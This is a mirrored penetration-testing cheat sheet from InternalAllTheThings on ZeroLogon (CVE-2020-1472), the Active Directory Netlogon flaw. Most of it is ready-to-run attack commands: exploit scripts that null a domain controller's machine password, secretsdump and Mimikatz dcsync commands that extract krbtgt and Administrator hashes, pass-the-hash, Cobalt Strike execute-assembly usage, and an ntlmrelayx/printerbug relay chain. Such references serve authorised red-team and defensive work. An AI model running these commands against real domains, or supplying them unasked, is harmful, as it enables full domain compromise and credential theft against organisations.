zerologon.md (4384B)
1 --- 2 title: "ZeroLogon" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/CVE/ZeroLogon.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/ZeroLogon.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # ZeroLogon 12 13 > CVE-2020-1472 14 15 **Exploitation**: 16 17 1. Spoofing the client credential 18 2. Disabling signing and sealing 19 3. Spoofing a call 20 4. Changing a computer's AD password to null 21 5. From password change to domain admin 22 6. :warning: reset the computer's AD password in a proper way to avoid any Deny of Service 23 24 **Tools**: 25 26 * `cve-2020-1472-exploit.py` - Python script from [dirkjanm](https://github.com/dirkjanm) 27 28 ```powershell 29 # Check (https://github.com/SecuraBV/CVE-2020-1472) 30 proxychains python3 zerologon_tester.py DC01 172.16.1.5 31 32 $ git clone https://github.com/dirkjanm/CVE-2020-1472.git 33 34 # Activate a virtual env to install impacket 35 $ python3 -m venv venv 36 $ source venv/bin/activate 37 $ pip3 install . 38 39 # Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py) 40 proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5 41 42 # Find the old NT hash of the DC 43 proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL' 44 45 # Restore password from secretsdump 46 # secretsdump will automatically dump the plaintext machine password (hex encoded) 47 # when dumping the local registry secrets on the newest version 48 python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3 49 deactivate 50 ``` 51 52 * `nccfsas` - .NET binary for Cobalt Strike's execute-assembly 53 54 ```powershell 55 git clone https://github.com/nccgroup/nccfsas 56 # Check 57 execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local 58 59 # Resetting the machine account password 60 execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset 61 62 # Testing from a non Domain-joined machine 63 execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch 64 65 # Now reset the password back 66 ``` 67 68 * `Mimikatz` - 2.2.0 20200917 Post-Zerologon 69 70 ```powershell 71 privilege::debug 72 # Check for the CVE 73 lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ 74 75 # Exploit the CVE and set the computer account's password to "" 76 lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit 77 78 # Execute dcsync to extract some hashes 79 lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm 80 lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm 81 82 # Pass The Hash with the extracted Domain Admin hash 83 sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN 84 85 # Use IP address instead of FQDN to force NTLM with Windows APIs 86 # Reset password to Waza1234/Waza1234/Waza1234/ 87 # https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584 88 lsadump::postzerologon /target:10.10.10.10 /account:DC01$ 89 ``` 90 91 * `netexec` - only check 92 93 ```powershell 94 netexec smb 10.10.10.10 -u username -p password -d domain -M zerologon 95 ``` 96 97 A 2nd approach to exploit zerologon is done by relaying authentication. 98 99 This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity. 100 The following prerequisites are needed: 101 102 * A domain account 103 * One DC running the `PrintSpooler` service 104 * Another DC vulnerable to zerologon 105 106 * `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) 107 108 ```powershell 109 # Check if one DC is running the PrintSpooler service 110 rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" 111 112 # Setup ntlmrelay in one shell 113 ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support 114 115 #Trigger printerbug in 2nd shell 116 python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 117 ``` 118 119 ## References 120 121 * [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort - September 15, 2020](https://web.archive.org/web/20200915011856/https://www.secura.com/pathtoimg.php?id=2055)